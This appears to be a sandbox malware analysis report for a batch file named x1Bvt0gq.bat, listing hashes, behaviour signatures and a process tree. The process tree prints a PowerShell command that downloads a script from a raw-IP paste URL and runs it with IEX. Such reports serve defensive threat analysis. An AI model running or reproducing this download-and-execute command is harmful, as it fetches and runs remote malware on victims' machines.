Analysis
max time kernel: 109s
max time network: 141s
platform: windows10_x64
resource: win10v200217
submitted: 08-03-2020 05:10
Static task: static1

Behavioral task: behavioral1
  Sample: x1Bvt0gq.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: x1Bvt0gq.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: x1Bvt0gq.bat
Size: 192B
MD5: dd1239e32d4fd55aae544bb15b09ea1f
SHA1: d4f32b49384a2337cbed07cfeebfa8e67e0802d4
SHA256: 715a6a90ff483fa2887f7e1f517e959d18854b52d8f7ed9b2c274e5b54a1c436
SHA512: 7a37249a47bfd25e8bd8c7c802cacdb5eb822b221e3a884599b49ab8798b0a9faf7ba98f34c14b7e7da39869f1bfcf452e482935ca502d77e829556921502646
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/x1Bvt0gq
Signatures

Program crash (1 IoCs)
  Processes:
    pid   pid_target  process       target process
    3524  3104        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  3524  WerFault.exe
    Token: SeBackupPrivilege   3524  WerFault.exe
    Token: SeDebugPrivilege    3524  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    3524  WerFault.exe (14 identical entries)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\x1Bvt0gq.bat"
   PID: 2516

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/x1Bvt0gq');Invoke-BBSQCBVUS;Start-Sleep -s 10000"
      PID: 3104

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 3524